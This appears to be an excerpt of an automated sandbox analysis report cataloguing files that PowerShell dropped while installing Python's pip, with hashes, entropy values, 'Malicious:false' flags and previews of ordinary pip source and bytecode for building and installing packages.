                              SSDEEP:24:iWsvKb7k+s4vDHvS2gkuS6aStsPPgE3Hgwr2Wyv2txl6zyDM5wt9S:0vKbwEK2F+Q/6230zdY9S
                              MD5:EA3BE896DD5BC494B745CE5D067CAC85
                              SHA1:894C86C3826E36D2FAA3CED593A016DBF144343A
                              SHA-256:DDD2C8862941D57DE69A163B63803692A58204CEF47BB21884C10A5A83B030B2
                              SHA-512:86A9C0164D94D53DBF76B07F4267EB719B1ED3638B0CFC1789EDF7E739CD26453555BA17263A77CB20F3EC65CA92B659899AF283D81B951D23FDB9970F34B87D
                              Malicious:false
                              Preview:........=.Cf3.........................~.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc.....................R.....|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5...|.j...................|.|...........}.d.d.d...........t.........j...................j...................|...........S.#.1.s.w...Y......)x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Desusertion directory: %sz.Building wheel for z. (pyproject.toml)).r....z.Failed building wheel for %s)...logger..debugr......subprocess_runner..build_wheel..Exception..error..os..path..join).r
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2034
                              Entropy (8bit):5.679731654498929
                              Encrypted:false
                              SSDEEP:48:OZZoPzvKzxOtG2F0PSqfJneUIg9qFZ0zOVw:C+b68c2CPSfPgaA
                              MD5:081A2AD471A734F57A7917FBC36D9666
                              SHA1:B11F45C8345F6F203D84678AB6A9FF32C5895249
                              SHA-256:15C57991AF842DD115115BCED63B865CB411ED87443621BD3A21685D73CB1552
                              SHA-512:1D306B7D7CF9B4542A3B3039D025956430D174312AD7CC0D0D3B9D3AA1615EC98F59231473DB07651A4398915F2CF707DF3CF2807898D0D03B2E8940262BCD69
                              Malicious:false
                              Preview:........=.Cf...............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.d.e.d.e.d.e.d.e.e.....f.d...Z.y.)......N)...Optional)...BuildBackendHookCaller..HookMissing)...runner_with_spinner_message..name..backend..metadata_directory..tempd..returnc...........................|...J.....t.........j...................d.|...........t.........d.|...d...........}.|.j...................|.........5.....|.j...................|.|...........}...d.d.d...........t.........j...................j...................|...........S.#.t.........$.r)}.t.........j...................d.|.|...........Y.d.}.~.d.d.d...........y.d.}.~.w.w.x.Y.w.#.1.s.w...Y......^x.Y.w.#.t.........$.r...t.........j...................d.|...........Y.y.w.x.Y.w.).z.Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. Nz.Desusertion directory: %sz.Building editable for z. (pyproject.tom
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3938
                              Entropy (8bit):5.628846380826758
                              Encrypted:false
                              SSDEEP:48:rFeM+G3ATAZOGAuHy+pNjws8bQZNcfwYRQammfU+S22N57a+tPZ6ksMpIIyN7Rc3:BV3zKzUjwnaKfZR6+S2szPZrsN7cCNe
                              MD5:40896534D47A804263B92A7448349834
                              SHA1:9DBAE030A5331F487115DD10C4E6913B3C4C34FD
                              SHA-256:7B550EDC43F97254EFD070ED8188B620A31E19D2F84170FF90FBB8202E603456
                              SHA-512:886ACD20BDCEA989D575E11782AB7CF2E6AAFEB455C42E7F428FF69709E3AFEF008794956342311109CEBCA6531EF9ABD4535982A89358EA7C2CCE8D53A16563
                              Malicious:false
                              Preview:........=.Cf................................d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.....e.j...................e.........Z.d.e.e.....d.e.d.e.f.d...Z.d.e.e.....d.e.d.e.d.e.e.....d.e.d.e.e.....f.d...Z.d.e.d.e.d.e.d.e.e.....d.e.e.....d.e.d.e.e.....f.d...Z.y.)......N)...List..Optional)...open_spinner).. make_setuptools_bdist_wheel_args)...call_subprocess..format_command_args..command_args..command_output..returnc...........................t.........|.........}.d.|...d...}.|.s.|.d.z...}.|.S.t.........j...........................t.........j...................kD..r.|.d.z...}.|.S.|.j...................d.........s.|.d.z...}.|.d.|.....z...}.|.S.).z'Format command information for logging.z.Command arguments: ...z.Command output: Nonez'Command output: [use --verbose to show]z.Command output:.).r......logger..getEffectiveLevel..logging..DEBUG..endswith).r....r......command_desc..texts.... .wC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):4832
                              Entropy (8bit):4.618328684403838
                              Encrypted:false
                              SSDEEP:96:IOYy0tIvdlzsjYMxasmoX2oL5QTUVan0FHPYQxai:IDywSldyiz0FHBai
                              MD5:F96311DD96F1BE4BB365524BE991BE50
                              SHA1:AD8A4AB522BB9F567A393CF6D0DE5ED1314CBAB7
                              SHA-256:CFE1F90CE92765D05ADDD87656AE9504C639A8B6082A6963DA9E821992B92DCF
                              SHA-512:D9E4F2BA33DE58F3F040D3DA293016EDB25BE0D02642F52947D0483B84E3851E644113672EA58C70123FADE9CDCE99B47239849CE0D14DE714EC1D37976FF854
                              Malicious:false
                              Preview:import contextlib.import hashlib.import logging.import os.from types import TracebackType.from typing import Dict, Generator, Optional, Set, Type, Union..from pip._internal.models.link import Link.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...@contextlib.contextmanager.def update_env_context_manager(**changes: str) -> Generator[None, None, None]:. target = os.environ.. # Save values from the target and change them.. non_existent_marker = object(). saved_values: Dict[str, Union[object, str]] = {}. for name, new_value in changes.items():. try:. saved_values[name] = target[name]. except KeyError:. saved_values[name] = non_existent_marker. target[name] = new_value.. try:. yield. finally:. # Restore original values in the target.. for name, original_value in saved_values.items():. if orig
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1422
                              Entropy (8bit):4.6243304875946425
                              Encrypted:false
                              SSDEEP:24:Ab0HQNdptouYXrkezPAZDI8QE2jbZjpmlLCGIJtHvH5lp0y2C5FX/P66fmepkety:AnNJSkO8QLjbZjpml+VvWy2C5ocnkyE/
                              MD5:39771CD0BE98EC2FA8E622FDA059FDF0
                              SHA1:C816FD8F874F799A9620D92DB505598D21C82BA8
                              SHA-256:F52D02503F14DD0A99797A7E672B7C1F1C14F74944E10AE760382BA990F30677
                              SHA-512:578A0446D208F615FADDA5C21CAEEAF4DF744572111C6043ADE541BFC142AC6354F4DE0E24DEC4D31535F433A1A663CF661C121351DCDBCA2510D0AEAD8F8A1E
                              Malicious:false
                              Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 517... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel, so we don't have to. # consider the possibility that this hook doesn't exist..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1474
                              Entropy (8bit):4.593686499595817
                              Encrypted:false
                              SSDEEP:24:Ab0HQNdptouYXrkezPAEBDI8QE2jbZjpmWLCGIJtHvH5lp9E2PA57/P66fmedQkX:AnNJSkx8QLjbZjpmW+VvLE2I5ucTQkyo
                              MD5:E46DA46FB32FE4B45B9961E977915B95
                              SHA1:DF9F933316C1DBFE666BFB169C6DE0D2884C74E6
                              SHA-256:54B2FB2EF9ED284F2AC5D854744261728B45CD4B0E488F0D352D38DF150B29EC
                              SHA-512:A25E7D52711F6FC40EB819C217CE90AF874ABA5CAE67B31272941DC7D151EAA8C57FCEF62EDB1835BE2AD6EEF6DBA0283CCA732361E7F20D7C6E4A0812D4A9E7
                              Malicious:false
                              Preview:"""Metadata generation logic for source distributions.."""..import os..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.build_env import BuildEnvironment.from pip._internal.exceptions import (. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.subprocess import runner_with_spinner_message.from pip._internal.utils.temp_dir import TempDirectory...def generate_editable_metadata(. build_env: BuildEnvironment, backend: BuildBackendHookCaller, details: str.) -> str:. """Generate metadata using mechanisms described in PEP 660... Returns the generated metadata directory.. """. metadata_tmpdir = TempDirectory(kind="modern-metadata", globally_managed=True).. metadata_dir = metadata_tmpdir.path.. with build_env:. # Note that BuildBackendHookCaller implements a fallback for. # prepare_metadata_for_build_wheel/editable, so we don't have to. # consider the possibility that this hook doe
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):2198
                              Entropy (8bit):4.514631026862264
                              Encrypted:false
                              SSDEEP:48:AyFTclkcBb5euAi9e6qa3h48Q4UOFY+2EVi/e2CFkyz1RJ5i:AyFTxcr13C8VFY+2lGCuRO
                              MD5:8D1B8A2EC71166ECC0014C332636D8E2
                              SHA1:01B6632B02F1FCA9880DACF96142556D33F159BB
                              SHA-256:A3E794DB502CD7BE610C2EDD96E3357C927F16AA244C84A1C96A6329A2291D9C
                              SHA-512:C6314BE4C5E87A9C7A4253DFCB26163666DF242834DFB3AE0B86CA2D2127AB39B1993FAAC474B4AC0E5A49A2B13A65C1166C2B0B72C0B0B6D3F567A375460A3D
                              Malicious:false
                              Preview:"""Metadata generation logic for legacy source distributions.."""..import logging.import os..from pip._internal.build_env import BuildEnvironment.from pip._internal.cli.spinners import open_spinner.from pip._internal.exceptions import (. InstallationError,. InstallationSubprocessError,. MetadataGenerationFailed,.).from pip._internal.utils.setuptools_build import make_setuptools_egg_info_args.from pip._internal.utils.subprocess import call_subprocess.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...def _find_egg_info(directory: str) -> str:. """Find an .egg-info subdirectory in `directory`.""". filenames = [f for f in os.listdir(directory) if f.endswith(".egg-info")].. if not filenames:. raise InstallationError(f"No .egg-info directory found in {directory}").. if len(filenames) > 1:. raise InstallationError(. "More than one .egg-info directory found in {}".format(directory). ).. return
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1075
                              Entropy (8bit):4.592001270993553
                              Encrypted:false
                              SSDEEP:24:tmdptPRVjWqaS2drOX8Sq7/P6R2TBNSSREhL:CdjP2dKXIuET3pEhL
                              MD5:BFD26E6B7D053BEAE312119DF6233540
                              SHA1:DCD764C358F280CC9FDB2E90AB06A9686D3F21BA
                              SHA-256:B13D761412C0C430BAC32AC3A2B87C92F719D631B9A889C2456CF33FE5242624
                              SHA-512:04462A2559C1FDD8815BEE2762899581B620D3035BE6CDF97BD081B9901B4DE633352C8D8D8444A13D6A549C6608C3420FD9717EDC0705BB5AFAC9F98897C6B8
                              Malicious:false
                              Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_pep517(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 517 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Desusertion directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building wheel for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. wheel_name = backend.build_wheel(. tempd,. metadata_directory=metadata_directory,. ). except Exception:. logger.error("Failed building wheel for
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1417
                              Entropy (8bit):4.3101463528891335
                              Encrypted:false
                              SSDEEP:24:tmdp9vaPCXvF6jWqat2drOXzP7/P66R2lvFIBNDcPzsdFjyEhL:C9vHXvgjI2dKXruXlva3DssdF2EhL
                              MD5:D481FB9C7608F878A84FB81A8A7AA2D1
                              SHA1:1D8E256134A57F9C5FA78BB388B31B61D2D0C3CE
                              SHA-256:C8EB681FACE9024A0A60452DAFC161CEB62790D1D0690063590D8761A7B53108
                              SHA-512:6DFC8DD2DDBDA76D94096930883688E83D50904173BFD1F6AB4F7EC3A4BA026B879059AD5443884F558C537234D38E22D43917DF406BB072B9C2898F0D12D859
                              Malicious:false
                              Preview:import logging.import os.from typing import Optional..from pip._vendor.pyproject_hooks import BuildBackendHookCaller, HookMissing..from pip._internal.utils.subprocess import runner_with_spinner_message..logger = logging.getLogger(__name__)...def build_wheel_editable(. name: str,. backend: BuildBackendHookCaller,. metadata_directory: str,. tempd: str,.) -> Optional[str]:. """Build one InstallRequirement using the PEP 660 build process... Returns path to wheel if successfully built. Otherwise, returns None.. """. assert metadata_directory is not None. try:. logger.debug("Desusertion directory: %s", tempd).. runner = runner_with_spinner_message(. f"Building editable for {name} (pyproject.toml)". ). with backend.subprocess_runner(runner):. try:. wheel_name = backend.build_editable(. tempd,. metadata_directory=metadata_directory,. ). exc
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):3064
                              Entropy (8bit):4.513661919781371
                              Encrypted:false
                              SSDEEP:48:PB2BMxxA1CiycvkJAWlQprspdzSCgGZnhqaLd8VsgS2QVMaGrXbF4+g9:PB2BT6JAWyprudz+GZnwOd8igS2QSFVS
                              MD5:3A5B36046CFE14561424A5E1EFB50CBB
                              SHA1:30C3511EBD59DC05391D5239455C12D74E697BC0
                              SHA-256:0BD8FAAEE920408D67FC97902E8646B8375F530CC25D287221D3D3A7A79D6CC4
                              SHA-512:BF8AC3322DFFD7B07975E05FF212345F240325204B7A87D55CBB0AEACA7BEA38DB68BB9EFC3330C807B73677FA5B9C0AE17795E2C448CF590439F252DC0E84AA
                              Malicious:false
                              Preview:import logging.import os.path.from typing import List, Optional..from pip._internal.cli.spinners import open_spinner.from pip._internal.utils.setuptools_build import make_setuptools_bdist_wheel_args.from pip._internal.utils.subprocess import call_subprocess, format_command_args..logger = logging.getLogger(__name__)...def format_command_result(. command_args: List[str],. command_output: str,.) -> str:. """Format command information for logging.""". command_desc = format_command_args(command_args). text = f"Command arguments: {command_desc}\n".. if not command_output:. text += "Command output: None". elif logger.getEffectiveLevel() > logging.DEBUG:. text += "Command output: [use --verbose to show]". else:. if not command_output.endswith("\n"):. command_output += "\n". text += f"Command output:\n{command_output}".. return text...def get_legacy_build_wheel_path(. names: List[str],. temp_dir: str,. name: str,. com
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):6806
                              Entropy (8bit):4.482733839291248
                              Encrypted:false
                              SSDEEP:96:kWH42xp5561FL56bMEHANrxR66YyvtsXS3y5PLEuLDMqaj7/ADyRWNQTJhDxE:kWNxFMFFQMrPyyvipi/AAWNQFtS
                              MD5:F2F39E7FF5671C534F4F335E773B9C5A
                              SHA1:D97AC05828EE730EE5B14A6F6E28DCE98A4F0B96
                              SHA-256:7ECA80F3C8866AA7ED0ABDAD94FDEC494DB4D824A4A0E0D1B56D0EF8953D3386
                              SHA-512:F0BC7552E171ED2963A7B12F55E6652CF334B3FF27E57810737A73909174B58D99B216D1D9C3DE92619F6A7F08A9F59B0FFDAD1300192272B6AA7732005E66B5
                              Malicious:false
                              Preview:"""Validation of dependencies of packages."""..import logging.from typing import Callable, Dict, List, NamedTuple, Optional, Set, Tuple..from pip._vendor.packaging.requirements import Requirement.from pip._vendor.packaging.specifiers import LegacySpecifier.from pip._vendor.packaging.utils import NormalizedName, canonicalize_name.from pip._vendor.packaging.version import LegacyVersion..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.metadata import get_default_environment.from pip._internal.metadata.base import DistributionVersion.from pip._internal.req.req_install import InstallRequirement.from pip._internal.utils.deprecation import deprecated..logger = logging.getLogger(__name__)...class PackageDetails(NamedTuple):. version: DistributionVersion. dependencies: List[Requirement]...# Shorthands.PackageSet = Dict[NormalizedName, PackageDetails].Missing = Tuple[NormalizedName, Requirement].Conflicting = Tuple[NormalizedName, Distri
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):9816
                              Entropy (8bit):4.064319785232956
                              Encrypted:false
                              SSDEEP:192:wKXwcXVX29FLZPq1gaFYD8uDMNBrVbFhZ0DID53hC/rP3Wf3WFcdbvRMuPV:wKnIMev8ue2/rueFcdlh
                              MD5:7DD939A42B1612389F3D939F07D813B7
                              SHA1:BFC4FAB55E20829097432E39193CDC13C99A3D10
                              SHA-256:BAAA1E4C07FA1CE615311D948004FC37CE54668184544A1075A9FF028E9239F9
                              SHA-512:33F913AD806204AB63A5DD080A708B24362A0ED74A9958A0357A1BC505A9BA9EA4FB1497BDE8370AB12DD8AE9B64F15642DE91A077F1194485A6CD23CDA6C86E
                              Malicious:false
                              Preview:import collections.import logging.import os.from typing import Container, Dict, Generator, Iterable, List, NamedTuple, Optional, Set..from pip._vendor.packaging.utils import canonicalize_name.from pip._vendor.packaging.version import Version..from pip._internal.exceptions import BadCommand, InstallationError.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.req.constructors import (. install_req_from_editable,. install_req_from_line,.).from pip._internal.req.req_file import COMMENT_RE.from pip._internal.utils.direct_url_helpers import direct_url_as_pep440_direct_reference..logger = logging.getLogger(__name__)...class _EditableInfo(NamedTuple):. requirement: str. comments: List[str]...def freeze(. requirement: Optional[List[str]] = None,. local_only: bool = False,. user_only: bool = False,. paths: Optional[List[str]] = None,. isolated: bool = False,. exclude_editable: bool = False,. skip: Container[str] = (),.) -> Ge
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):51
                              Entropy (8bit):4.155090479515533
                              Encrypted:false
                              SSDEEP:3:d/IF7CL5Dv:RI5CLdv
                              MD5:C6F771F71FE2E186FB048050F4D2E467
                              SHA1:C72C58E6CD7763F27AC8041D54F6390149AFC48E
                              SHA-256:997EE1C83D863413B69851A8903437D2BFC65EFED8FCF2DDB71714BF5E387BEB
                              SHA-512:A2A8D3F7862E8260EBC53B6670830104DCCD73A6292E1ECEF40379A167BAC510F81A3583C3AFA0EAAF6632BE771DCC54BE22F00330938B42B70B331DC42A9A0F
                              Malicious:false
                              Preview:"""For modules related to installing packages..""".
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):275
                              Entropy (8bit):5.103910727887639
                              Encrypted:false
                              SSDEEP:6:rUctaCCAI5CLf/Z6B0WltBn23d6oAreKAqAImZEqc6IaYleHXlll:gctaCC5cLp6BvPAImbsKYjaYkH1ll
                              MD5:199D245BEFC5BCF01835D6A37EF19325
                              SHA1:F6089CAD6E503DD1AA5278B94F3E87694234D32F
                              SHA-256:B4DD84219340EA78EFFBD8E577993C8D8F8FB62CCF5EFBD1664529B791C8E46E
                              SHA-512:1416E1369EB9A556EB62D807306B04F2AFDB57D4F1E1E134865291FBD4ABC25EC30C1B674AC9745BCC665501299A2D31D50786E9650C22FB251CCB81C1BD0837
                              Malicious:false
                              Preview:........=.Cf3...............................d.Z.y.).z,For modules related to installing packages..N)...__doc__........uC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/install/__init__.py..<module>r........s..............r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1826
                              Entropy (8bit):5.637739724451762
                              Encrypted:false
                              SSDEEP:48:2A+qkNlXWRZR+0NtpdI1QPEz98/mBs8C7CphPtIf:2zXGRn+iJkQPEz98MZhC
                              MD5:D3280E67FD5F196748C3BC42CBB7FD9A
                              SHA1:145215D35D567A90A26ABABDFC2423D5C0E1E973
                              SHA-256:254A517FEE4647220D2F850E6F7A86AAD10740FCFDAA1C029448E092936A4793
                              SHA-512:F496995742EB47D4B1E90DCE6C333AB18A998ED3198343505E43705A1E32F8D3420889C6A3F87E1AE9049AA2EDF9BF9EBE72966B3956301BC082BC4A7D8539D7
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................e.........Z.d.e.e.....d.e.e.....d.e.e.....d.e.d.e.d.e.d.e.d.e.d.e.d.d.f.d...Z.y.).z?Legacy editable installation process, i.e. `setup.py develop`.......N)...Optional..Sequence)...BuildEnvironment)...indent_log)...make_setuptools_develop_args)...call_subprocess..global_options..prefix..home..use_user_site..name..setup_py_path..isolated..build_env..unpacked_source_directory..returnc...........................t.........j...................d.|...........t.........|.|.|.|.|.|...........}.t.................5...|.5...t.........|.d.|.............d.d.d...........d.d.d...........y.#.1.s.w...Y.......x.Y.w.#.1.s.w...Y.....y.x.Y.w.).z[Install a package in editable mode. Most arguments are pass-through. to setuptools.. z.Running setup.py develop for %s).r......no_user_configr....r....r....z.python setup.py develop)...command_desc..cwdN)...logger..infor
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):33868
                              Entropy (8bit):5.394269867211978
                              Encrypted:false
                              SSDEEP:384:zR2WOFltE/3NJiJuhwT8o2pABLhcyoAe/rsl/d0Vkycqmeg38czAuJAl9V8:7OFla/niACOIhpo3W1028cst9K
                              MD5:5B22422591E7F7CF6DC238E66D235A00
                              SHA1:CF6F50AF3F5E943CE15DC87755C7EAFFBEC358C7
                              SHA-256:945B40359C7FEE0017D31EF16ECD384B79E86931BC8EEAB4B9F305CBBB06ACD7
                              SHA-512:61FBD44601792E2A3319B36D2B04D91FC64F00608DF3FF301076CC3576FE6F226D8FD3C6E62D14C96F6A9508FBEE15786BAE66805970B1FFE9F4C289351A7B56
                              Malicious:false
                              Preview:........=.Cf.j.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&..d.d.l'm(Z(m)Z)..d.d.l*m+Z+..d.d.l,m-Z-..d.d.l.m/Z/..d.d.l0m1Z1..d.d.l2m3Z3..d.d.l4m5Z5m6Z6m7Z7..d.d.l8m9Z9m:Z:..d.d.l;m<Z<m=Z=..d.d.l>m?Z?m@Z@..d.d.lAmBZBmCZCmDZDmEZE..d.d.lFmGZGmHZHmIZImJZJ..d.d.lKmLZL..e.r.d.d.l.mMZM....G.d...d.eM........ZN..e.j...................eP........ZQ..e d.eR........ZSe$eSeRe%eTeRf.....f.....ZUdId.eRd.eTd.e$eReRf.....f.d...ZVd.eRd.e.eRe.f.....f.d...ZWd.eRd.eXf.d...ZYd.e.d.eXf.d ..ZZd!e5d.e$e.eReRf.....e.eReRf.....f.....f.d"..Z[d#e"eR....d.e!eR....f.d$..Z\d%e.eU....d.e.e$eReReRf.........f.d&..Z]d'eSd(eRd.eRf.d)..Z^d.eRd(eRd.eSf.d*..Z_d+e.e.eR........d,e.eSeSf.....d-e#eS....d.e.eR....d(eRd.e.eU....f.d/..Z`d0e.eReRf.....d.e.eR....f.d1..Za..G.d2..d3........Zb..G.d4..d5........Zc..G.d6..d7e1........Zdd8eRd.d.f.d9
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):1282
                              Entropy (8bit):4.529425309919988
                              Encrypted:false
                              SSDEEP:24:6NXahpouY2vZHVY/vPXIAavFw3pm8MUUKxmml97+ZyICoUC:iXaPXvZ1savi5m8JUNZyrC
                              MD5:DCB76A8AD093B7E45F58BE9D79106C59
                              SHA1:61A524BDA27C4AB0F2BD898903EE87E51D34F59A
                              SHA-256:61E47429A7565F0FD985E0B536D006D6A5481243A04461DCDB7C7E62D196ECD5
                              SHA-512:C00A2CF22BBDBEA5D024F1F2181A0D7557675A7B2C28B9DF9D58466E1E36111A6406D9F0D1587FA4D5E5FD07081580DB08D72DC26AA5A8B83709AD3D56EDAE8D
                              Malicious:false
                              Preview:"""Legacy editable installation process, i.e. `setup.py develop`..""".import logging.from typing import Optional, Sequence..from pip._internal.build_env import BuildEnvironment.from pip._internal.utils.logging import indent_log.from pip._internal.utils.setuptools_build import make_setuptools_develop_args.from pip._internal.utils.subprocess import call_subprocess..logger = logging.getLogger(__name__)...def install_editable(. *,. global_options: Sequence[str],. prefix: Optional[str],. home: Optional[str],. use_user_site: bool,. name: str,. setup_py_path: str,. isolated: bool,. build_env: BuildEnvironment,. unpacked_source_directory: str,.) -> None:. """Install a package in editable mode. Most arguments are pass-through. to setuptools.. """. logger.info("Running setup.py develop for %s", name).. args = make_setuptools_develop_args(. setup_py_path,. global_options=global_options,. no_user_config=isolated,. prefix=pref
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):27311
                              Entropy (8bit):4.642708671405098
                              Encrypted:false
                              SSDEEP:384:0GHMR/kRyVVi89DzT8O1WCqclVNe3nHCFvtoMWgCq2JTRH:0QI/bPnkVclVNe3H6hE1RH
                              MD5:F885BF99952E370232B260C8B3A4A2B0
                              SHA1:1CC61594079640CF319031BD5FD0F278ED519D1E
                              SHA-256:F6119BD5CE1B4673C86F6146EC2B5448F7CFC6AA6B987401B702009563CD4ED1
                              SHA-512:A16709DACFB9BAB959F2537C09B1673332F8A67DA65FF2877401E4768E83B34ABAE4B3E966A65ED1B04E7159B240AC4EFED0832E0300F396FD2F66D5B185D7D0
                              Malicious:false
                              Preview:"""Support for installing and building the "wheel" binary package format.."""..import collections.import compileall.import contextlib.import csv.import importlib.import logging.import os.path.import re.import shutil.import sys.import warnings.from base64 import urlsafe_b64encode.from email.message import Message.from itertools import chain, filterfalse, starmap.from typing import (. IO,. TYPE_CHECKING,. Any,. BinaryIO,. Callable,. Dict,. Generator,. Iterable,. Iterator,. List,. NewType,. Optional,. Sequence,. Set,. Tuple,. Union,. cast,.).from zipfile import ZipFile, ZipInfo..from pip._vendor.distlib.scripts import ScriptMaker.from pip._vendor.distlib.util import get_export_entry.from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.exceptions import InstallationError.from pip._internal.locations import get_major_minor_version.from pip._internal.metadata import (. BaseDistribution,. FilesystemWheel,. ge
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):28128
                              Entropy (8bit):4.3534757921233584
                              Encrypted:false
                              SSDEEP:384:6wqVVk3BUI64dQw93NywZO6FK1pbSTB5wqCMrcAr4OVN3h5rgcyxK:sp8QZwZTccaqCM/rJVN3LgcmK
                              MD5:D47E3EB660F7DBCAEC2D8BB2BC871B01
                              SHA1:DC57A38D370F140ADFB08A5C8EDD2E35FF19EB40
                              SHA-256:E7B3AAF3B1DFBA75F745BAA9E3B15D689AFD7076C02949BFDE0BFB5A1040A9B1
                              SHA-512:7DF3547C12AB029CA0B7D2CF0FAC89CD65AC3273C347DACD1BE635F24FD690576015C7516326A650076D8A6507DCF0BA0D571598B2920BB4A8336435C847D3CB
                              Malicious:false
                              Preview:"""Prepares a distribution for installation."""..# The following comment should be removed at some point in the future..# mypy: strict-optional=False..import mimetypes.import os.import shutil.from pathlib import Path.from typing import Dict, Iterable, List, Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.distributions import make_distribution_for_install_requirement.from pip._internal.distributions.installed import InstalledDistribution.from pip._internal.exceptions import (. DirectoryUrlHashUnsupported,. HashMismatch,. HashUnpinned,. InstallationError,. MetadataInconsistent,. NetworkConnectionError,. VcsHashUnsupported,.).from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_metadata_distribution.from pip._internal.models.direct_url import ArchiveInfo.from pip._internal.models.link import Link.from pip._internal.models.wheel import Wheel.from pip._internal.netwo
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):7152
                              Entropy (8bit):4.544558175493023
                              Encrypted:false
